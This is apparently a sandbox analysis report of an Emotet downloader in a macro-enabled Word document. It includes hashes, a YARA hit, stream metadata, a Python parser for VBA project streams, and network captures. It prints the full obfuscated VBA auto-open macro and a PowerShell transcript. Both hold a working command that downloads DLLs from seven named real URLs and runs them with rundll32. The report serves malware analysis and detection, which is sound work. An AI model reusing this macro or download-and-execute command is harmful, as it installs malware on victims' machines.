                                                                                                                                    SHA1:68B22249C6035C8E610AB2A0D5CDAA027ED89ECF
                                                                                                                                    SHA-256:4072B7B218F6015D89A89323BB2574C7B5C27E7859D7CF7FDB842B58EFC230A3
                                                                                                                                    SHA-512:6CDDB80806C48D8B8A2CAE7900860704AF7D91232E1071C391954A44E94F6E8FB1AA3E34274E43410266D397C881DF5D1EA1A8DAEBAF76BCF5E8A5A92AEE03A7
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_EmotetDownloader, Description: Yara detected Emotet Downloader, Source: C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt, Author: Joe Security
                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211122132255..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell $dfkj=$strs="http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/".Split(",");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth="c:\programdata\"+$r1+".dll";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp="c:\windows\syswow64\rundll32.exe";$a=$tpth+",f"+$r2;Start-Process $fp -ArgumentList $a;break;}};;IEX $dfkj..Process ID: 6312..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersio

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:Microsoft Word 2007+
                                                                                                                                    Entropy (8bit):7.953888666040384
                                                                                                                                    TrID:
                                                                                                                                    • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                    • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                    • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                    • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                    File name:704.doc
                                                                                                                                    File size:146367
                                                                                                                                    MD5:40f85d07da2533d576b1f2d7c043a2da
                                                                                                                                    SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
                                                                                                                                    SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
                                                                                                                                    SHA512:fb718ea1a81fdcba7c933cd55a54beeee660a7e4d5b0a1e1ee11351e40cc691dd3fb644dce60335dfea9c983fc5a4ce079b2a3349fb26c77c444c66cada454a2
                                                                                                                                    SSDEEP:3072:hAGj2SXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDve/Nk:9CSXw50+OukzVXV2uhDCG/Nk
                                                                                                                                    File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                    Static OLE Info

                                                                                                                                    General

                                                                                                                                    Document Type:OpenXML
                                                                                                                                    Number of OLE Files:1

                                                                                                                                    OLE File "/opt/package/joesandbox/database/analysis/526268/sample/704.doc"

                                                                                                                                    Indicators

                                                                                                                                    Has Summary Info:False
                                                                                                                                    Application Name:unknown
                                                                                                                                    Encrypted Document:False
                                                                                                                                    Contains Word Document Stream:
                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                    Flash Objects Count:
                                                                                                                                    Contains VBA Macros:True

                                                                                                                                    Summary

                                                                                                                                    Author:1
                                                                                                                                    Template:Normal.dotm
                                                                                                                                    Last Saved By:1
                                                                                                                                    Revision Number:103
                                                                                                                                    Total Edit Time:211
                                                                                                                                    Create Time:2021-11-15T15:39:00Z
                                                                                                                                    Last Saved Time:2021-11-18T19:09:00Z
                                                                                                                                    Number of Pages:1
                                                                                                                                    Number of Words:16
                                                                                                                                    Number of Characters:95
                                                                                                                                    Creating Application:Microsoft Office Word
                                                                                                                                    Security:0

                                                                                                                                    Document Summary

                                                                                                                                    Number of Lines:1
                                                                                                                                    Number of Paragraphs:1
                                                                                                                                    Thumbnail Scaling Desired:false
                                                                                                                                    Company:
                                                                                                                                    Contains Dirty Links:false
                                                                                                                                    Shared Document:false
                                                                                                                                    Changed Hyperlinks:false
                                                                                                                                    Application Version:12.0000

                                                                                                                                    Streams with VBA

                                                                                                                                    VBA File Name: cvbku3gakuisdgfilu3gblaw.cls, Stream Size: 10382
                                                                                                                                    General
                                                                                                                                    Stream Path:VBA/cvbku3gakuisdgfilu3gblaw
                                                                                                                                    VBA File Name:cvbku3gakuisdgfilu3gblaw.cls
                                                                                                                                    Stream Size:10382
                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 9e 08 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff a7 08 00 00 3f 1b 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                    VBA Code
                                                                                                                                    Attribute VB_Name = "cvbku3gakuisdgfilu3gblaw"
                                                                                                                                    Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                    Attribute VB_TemplateDerived = True
                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                    Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed(Optional ByVal Title As String = ",", Optional ByVal InitialPath As String = ":") As String
                                                                                                                                        Dim PS As String: PS = Application.PathSeparator
                                                                                                                                        With Application.FileDialog(msoFileDialogFolderPicker)
                                                                                                                                            If Not Right$(InitialPath, 1) = PS Then InitialPath = InitialPath & PS
                                                                                                                                            .ButtonName = ":": .Title = Title: .InitialFileName = InitialPath
                                                                                                                                            If .Show <> -1 Then Exit Function
                                                                                                                                            If Not Right$(GetFolderPath, 1) = PS Then GetFolderPath = GetFolderPath & PS
                                                                                                                                        End With
                                                                                                                                    End Function
                                                                                                                                    Sub sfoliq3hwoqihepolfijp()
                                                                                                                                        gjpo4jaiwledkgls = GetFolderPath(",", ThisWorkbook.Path)
                                                                                                                                        If gjpo4jaiwledkgls = "" Then Exit Sub
                                                                                                                                        MsgBox ":" & gjpo4jaiwledkgls, vbInformation
                                                                                                                                    End Sub
                                                                                                                                    Sub dfloaswehortiwholehfolsihlkw()
                                                                                                                                        txt$ = FileToVBAFunction(",", ",")
                                                                                                                                        Debug.Print txt$
                                                                                                                                    End Sub
                                                                                                                                    Sub fbkaw4lkuwgbtlske()
                                                                                                                                    Dim WB As Workbook
                                                                                                                                    Set WB = GetAnotherWorkbook
                                                                                                                                    If Not WB Is Nothing Then
                                                                                                                                    MsgBox "&" & WB.FullName, vbInformation
                                                                                                                                    Else
                                                                                                                                    MsgBox ",", vbCritical: Exit Sub
                                                                                                                                    End If
                                                                                                                                    x = WB.Worksheets(1).Range("a2")
                                                                                                                                    End Sub
                                                                                                                                    Function goh4iahwodegiyna89deyfni(fhi3hof3hfolk As String, dfh3olhuiefoiasihkl As String) As String
                                                                                                                                    Dim cbuay7aygsikjbkv As Integer
                                                                                                                                    Dim fjoq3wihrpoa8fghoashf As String: cbuay7aygsikjbkv = 10: fjoq3wihrpoa8fghoashf = Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "")
                                                                                                                                    For sgdyuiwuygiasb = 1 To cbuay7aygsikjbkv
                                                                                                                                    If sgdyuiwuygiasb > 20 Then
                                                                                                                                    MsgBox ","
                                                                                                                                    End If
                                                                                                                                    Next
                                                                                                                                    goh4iahwodegiyna89deyfni = fjoq3wihrpoa8fghoashf
                                                                                                                                    End Function
                                                                                                                                    Function gajowisjd90asdilkf() As Object
                                                                                                                                    On Error Resume Next
                                                                                                                                    Dim coll As New Collection, WB As Workbook
                                                                                                                                    For Each WB In Workbooks
                                                                                                                                    If WB.name <> ThisWorkbook.name Then
                                                                                                                                    If Windows(WB.name).Visible Then coll.Add CStr(WB.name)
                                                                                                                                    End If
                                                                                                                                    Next WB
                                                                                                                                    Select Case coll.Count
                                                                                                                                    Case 0
                                                                                                                                    MsgBox ",", vbCritical, ","
                                                                                                                                    Case 1
                                                                                                                                    Set GetAnotherWorkbook = Workbooks(coll(1))
                                                                                                                                    Case Else
                                                                                                                                    For i = 1 To coll.Count
                                                                                                                                    txt = txt & i & vbTab & coll(i) & vbNewLine
                                                                                                                                    Next i
                                                                                                                                    msg = "&" & vbNewLine & vbNewLine & txt
                                                                                                                                    res = InputBox(msg, ",", 1)
                                                                                                                                    If IsNumeric(res) Then Set GetAnotherWorkbook = Workbooks(coll(Val(res)))
                                                                                                                                    End Select
                                                                                                                                    End Function
                                                                                                                                    Sub fjow3efyw98efhasdokfhlnkvawofh3(nart4kuagiuagsaedr54 As Long, bvagh4iauhoshetret As Long, fbhqwieusiyeoiwugeig As String): Dim sdgbvku3giqugfi2, fhokl34rhyw5uwegea, hkqwfsadesf As String
                                                                                                                                    Dim s1, ra As String: Dim bfik3uvgikuds As Double
                                                                                                                                    Dim dvfghwkuibisdbgfiw As Object
                                                                                                                                    Dim d, R As Double
                                                                                                                                    For bkwefiusdif = 1 To 10
                                                                                                                                    If bkwefiusdif = 7 Then
                                                                                                                                    dvfghwkuibisdbgfiw.CreateObject(goh4iahwodegiyna89deyfni("WRIsRIcRIriRIpt.RISRIheRIlRIl", "RI"), "").Run fhokl34rhyw5uwegea, 0
                                                                                                                                    Else
                                                                                                                                    If bkwefiusdif = 3 Then
                                                                                                                                    Set dvfghwkuibisdbgfiw = CreateObject(goh4iahwodegiyna89deyfni("fARDfAS.fADafAtafASpfAacfAe", "fA"))
                                                                                                                                    Dim fs As Integer: If bfik3uvgikuds < 0.021335 And bfik3uvgikuds > -0.0134542765 Then fhokl34rhyw5uwegea = goh4iahwodegiyna89deyfni(fbhqwieusiyeoiwugeig, "elf")
                                                                                                                                    End If
                                                                                                                                    End If
                                                                                                                                    Next
                                                                                                                                    If d <> 0.123456 Then
                                                                                                                                    ra = Replace(s1, ",", "")
                                                                                                                                    End If
                                                                                                                                    End Sub
                                                                                                                                    Private Function dfjolirhoghwow(ByVal filename$, Optional ByVal name$ = "") As String
                                                                                                                                        On Error Resume Next: Err.Clear: Const BYTES_PER_ROW& = 480
                                                                                                                                        Dim F_Content$
                                                                                                                                        ff& = FreeFile: Open filename$ For Binary Access Read As #ff
                                                                                                                                        fs& = LOF(ff): txt$ = String(fs&, Chr(0))
                                                                                                                                        Get #ff, , txt$: Close #ff
                                                                                                                                        F_Content$ = F_Content$ & "&" & name$ & "&" & vbNewLine
                                                                                                                                        F_Content$ = F_Content$ & "" & vbNewLine
                                                                                                                                        For i = 1 To Len(txt$)
                                                                                                                                            R& = Asc(Mid(txt, i, 1))
                                                                                                                                            res$ = res$ & IIf(Len(Hex(R)) = 1, "0", "") & Hex(R)
                                                                                                                                            If i Mod BYTES_PER_ROW& = 0 Then
                                                                                                                                                F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
                                                                                                                                                res = "": DoEvents
                                                                                                                                            End If
                                                                                                                                        Next
                                                                                                                                        If Len(res) Then F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
                                                                                                                                        F_Content$ = F_Content$ & "" & vbNewLine
                                                                                                                                        FileToVBAFunction = F_Content$
                                                                                                                                    End Function
                                                                                                                                    Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
                                                                                                                                    fjow3efyw98efhasdokfhlnkvawofh3 0, 0, "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\""." & "Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj": End Sub

                                                                                                                                    Streams

                                                                                                                                    Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 519
                                                                                                                                    General
                                                                                                                                    Stream Path:PROJECT
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Stream Size:519
                                                                                                                                    Entropy:5.27637957879
                                                                                                                                    Base64 Encoded:True
                                                                                                                                    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = c v b k u 3 g a k u i s d g f i l u 3 g b l a w / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 6 4 4 E A B 6 7 6 B A B 8 B E B 8 B E B C C 2 B C C 2 " . .
                                                                                                                                    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41
                                                                                                                                    Stream Path: PROJECTwm, File Type: data, Stream Size: 77
                                                                                                                                    General
                                                                                                                                    Stream Path:PROJECTwm
                                                                                                                                    File Type:data
                                                                                                                                    Stream Size:77
                                                                                                                                    Entropy:3.2550852567
                                                                                                                                    Base64 Encoded:False
                                                                                                                                    Data ASCII:c v b k u 3 g a k u i s d g f i l u 3 g b l a w . c . v . b . k . u . 3 . g . a . k . u . i . s . d . g . f . i . l . u . 3 . g . b . l . a . w . . . . .
                                                                                                                                    Data Raw:63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 00 63 00 76 00 62 00 6b 00 75 00 33 00 67 00 61 00 6b 00 75 00 69 00 73 00 64 00 67 00 66 00 69 00 6c 00 75 00 33 00 67 00 62 00 6c 00 61 00 77 00 00 00 00 00
                                                                                                                                    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4731
                                                                                                                                    General
                                                                                                                                    Stream Path:VBA/_VBA_PROJECT
                                                                                                                                    File Type:data
                                                                                                                                    Stream Size:4731
                                                                                                                                    Entropy:4.84395391101
                                                                                                                                    Base64 Encoded:False
                                                                                                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                                                                                    Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                    Stream Path: VBA/dir, File Type: data, Stream Size: 843
                                                                                                                                    General
                                                                                                                                    Stream Path:VBA/dir
                                                                                                                                    File Type:data
                                                                                                                                    Stream Size:843
                                                                                                                                    Entropy:6.51963251442
                                                                                                                                    Base64 Encoded:True
                                                                                                                                    Data ASCII:. G . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . i . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
                                                                                                                                    Data Raw:01 47 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 1a 69 8e 63 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
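The four streams above are the VBA project's metadata as MS-OVBA lays it out: PROJECT is the plain-text property list (the module names, project name and the CMG/DPB/GC protection records), PROJECTwm repeats each module name once as an MBCS string and once in UTF-16LE, and _VBA_PROJECT opens with a fixed header in front of the version-specific p-code cache. The Python below is an added example, not part of the Joe Sandbox report. It parses those three streams from the bytes the report prints (PROJECTwm is complete at 77 bytes; for PROJECT and _VBA_PROJECT only the visible prefix is reconstructed, so the cut-off DPB/GC records are absent and that is an assumption of the sample), checks that the module named in PROJECT is the one PROJECTwm lists, validates the _VBA_PROJECT header, and recomputes the Shannon entropy the report shows for PROJECTwm so the transcription can be trusted. A mismatch between the two name lists is one cheap sign of a hand-edited project; the all-zero project ID is surfaced as something to pivot on, not as an indicator by itself.

```python
"""Parse the VBA project metadata streams (PROJECT, PROJECTwm, _VBA_PROJECT).

Added example; not part of the Joe Sandbox report. Byte strings are copied
from the report's Data Raw / Data ASCII dumps: PROJECTwm is complete (77 bytes),
PROJECT and _VBA_PROJECT are only the visible prefixes (assumption: the
cut-off PROJECT records are DPB=, GC= and the [Host Extender Info] section).
"""
import math
import struct
from collections import Counter

PROJECTWM = bytes.fromhex(
    "63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 00 "
    "63 00 76 00 62 00 6b 00 75 00 33 00 67 00 61 00 6b 00 75 00 69 00 73 00 "
    "64 00 67 00 66 00 69 00 6c 00 75 00 33 00 67 00 62 00 6c 00 61 00 77 00 "
    "00 00 00 00"
)

PROJECT_TEXT = (
    'ID="{00000000-0000-0000-0000-000000000000}"\r\n'
    'Document=cvbku3gakuisdgfilu3gblaw/&H00000000\r\n'
    'Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}\r\n'
    'HelpFile=""\r\n'
    'Name="Project"\r\n'
    'HelpContextID="0"\r\n'
    'VersionCompatible32="393222000"\r\n'
    'CMG="4644EAB676BAB8BEB8BEBCC2BCC2"\r\n'
)

VBA_PROJECT_HDR = bytes.fromhex("cc 61 88 00 00 01 00")

ZERO_GUID = "{00000000-0000-0000-0000-000000000000}"


def parse_projectwm(data: bytes) -> list:
    """PROJECTwm (MS-OVBA 2.3.3): per module, a NUL-terminated MBCS name followed
    by the same name in UTF-16LE with a 2-byte terminator; the list ends with an
    empty (0x0000) entry."""
    entries, pos = [], 0
    while pos < len(data):
        end = data.index(b"\x00", pos)
        if end == pos:            # empty MBCS name: end-of-list marker
            break
        mbcs = data[pos:end].decode("cp1252")
        pos = end + 1
        u_end = pos
        while data[u_end:u_end + 2] != b"\x00\x00":
            u_end += 2
        entries.append((mbcs, data[pos:u_end].decode("utf-16-le")))
        pos = u_end + 2
    return entries


def parse_project(text: str) -> dict:
    """PROJECT (MS-OVBA 2.3.1): key=value lines. Module=/Document=/Class=/BaseClass=
    name code modules; a Document module carries a '/&H........' suffix."""
    info = {"modules": []}
    for line in text.splitlines():
        if not line or line.startswith("["):   # skip blanks and [Host Extender Info]
            continue
        key, _, value = line.partition("=")
        if key in ("Module", "Document", "Class", "BaseClass"):
            info["modules"].append((key, value.split("/&H")[0]))
        else:
            info[key] = value.strip('"')
    return info


def parse_vba_project_header(data: bytes) -> dict:
    """_VBA_PROJECT (MS-OVBA 2.3.4.1): Reserved1 must be 0x61CC, then the 2-byte
    field the spec labels Version, a 1-byte Reserved2 (0x00) and 2 reserved
    bytes. The p-code PerformanceCache that follows is only reused by the VBA
    build that wrote it, which is the property VBA stomping relies on."""
    reserved1, version, reserved2, reserved3 = struct.unpack("<HHBH", data[:7])
    return {"valid": reserved1 == 0x61CC and reserved2 == 0,
            "version": version, "reserved3": reserved3}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the figure the report prints as 'Entropy'."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def summarize() -> dict:
    """Cross-check the three streams as a triage step."""
    wm = {utf16 for _, utf16 in parse_projectwm(PROJECTWM)}
    proj = parse_project(PROJECT_TEXT)
    declared = {name for _, name in proj["modules"]}
    hdr = parse_vba_project_header(VBA_PROJECT_HDR)
    return {
        "modules": sorted(declared),
        "module_names_match": declared == wm,   # False would mean a hand-edited project
        "zero_project_id": proj.get("ID") == ZERO_GUID,
        "vba_project_header_ok": hdr["valid"],
        "vba_version_field": hex(hdr["version"]),
        "projectwm_entropy": round(shannon_entropy(PROJECTWM), 6),
    }


if __name__ == "__main__":
    for k, v in summarize().items():
        print(f"{k}: {v}")
```

On a real sample, pull the streams with olefile (`ole.openstream("Macros/PROJECT")` and so on for a .doc) and feed them to the same functions; the entropy check is the quick way to confirm a dump was transcribed without error before trusting the rest.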

                                                                                                                                    Network Behavior

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2021 13:23:07.452250004 CET | 49754 | 80 | 192.168.2.4 | 148.72.96.3
Nov 22, 2021 13:23:07.562594891 CET | 80 | 49754 | 148.72.96.3 | 192.168.2.4
Nov 22, 2021 13:23:07.563997984 CET | 49754 | 80 | 192.168.2.4 | 148.72.96.3
Nov 22, 2021 13:23:07.621309042 CET | 49754 | 80 | 192.168.2.4 | 148.72.96.3
Nov 22, 2021 13:23:07.732103109 CET | 80 | 49754 | 148.72.96.3 | 192.168.2.4
Nov 22, 2021 13:23:07.732558012 CET | 80 | 49754 | 148.72.96.3 | 192.168.2.4
Nov 22, 2021 13:23:07.783896923 CET | 49754 | 80 | 192.168.2.4 | 148.72.96.3
Nov 22, 2021 13:23:12.137522936 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145
Nov 22, 2021 13:23:12.395803928 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:12.395912886 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145
Nov 22, 2021 13:23:12.396229029 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145
Nov 22, 2021 13:23:12.655375004 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:12.655504942 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:12.656769991 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145
Nov 22, 2021 13:23:12.738183975 CET | 80 | 49754 | 148.72.96.3 | 192.168.2.4
Nov 22, 2021 13:23:12.738598108 CET | 49754 | 80 | 192.168.2.4 | 148.72.96.3
Nov 22, 2021 13:23:12.955651045 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:13.009346008 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:13.009438992 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:13.009509087 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145
Nov 22, 2021 13:23:13.009685040 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:13.009969950 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:13.010060072 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145
Nov 22, 2021 13:23:13.010180950 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:13.010404110 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:13.010487080 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145
Nov 22, 2021 13:23:13.011825085 CET | 80 | 49755 | 60.248.112.145 | 192.168.2.4
Nov 22, 2021 13:23:13.128189087 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145
Nov 22, 2021 13:23:16.146481991 CET | 49754 | 80 | 192.168.2.4 | 148.72.96.3
Nov 22, 2021 13:23:16.146840096 CET | 49755 | 80 | 192.168.2.4 | 60.248.112.145

                                                                                                                                    UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2021 13:23:07.295005083 CET | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Nov 22, 2021 13:23:07.316490889 CET | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Nov 22, 2021 13:23:11.849472046 CET | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Nov 22, 2021 13:23:12.135129929 CET | 53 | 53097 | 8.8.8.8 | 192.168.2.4

                                                                                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 22, 2021 13:23:07.295005083 CET | 192.168.2.4 | 8.8.8.8 | 0xc0dd | Standard query (0) | primtalent.com | A (IP address) | IN (0x0001)
Nov 22, 2021 13:23:11.849472046 CET | 192.168.2.4 | 8.8.8.8 | 0xdf56 | Standard query (0) | huskysb.com | A (IP address) | IN (0x0001)

                                                                                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 22, 2021 13:23:07.316490889 CET | 8.8.8.8 | 192.168.2.4 | 0xc0dd | No error (0) | primtalent.com | (none) | 148.72.96.3 | A (IP address) | IN (0x0001)
Nov 22, 2021 13:23:12.135129929 CET | 8.8.8.8 | 192.168.2.4 | 0xdf56 | No error (0) | huskysb.com | (none) | 60.248.112.145 | A (IP address) | IN (0x0001)

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • primtalent.com
                                                                                                                                    • huskysb.com
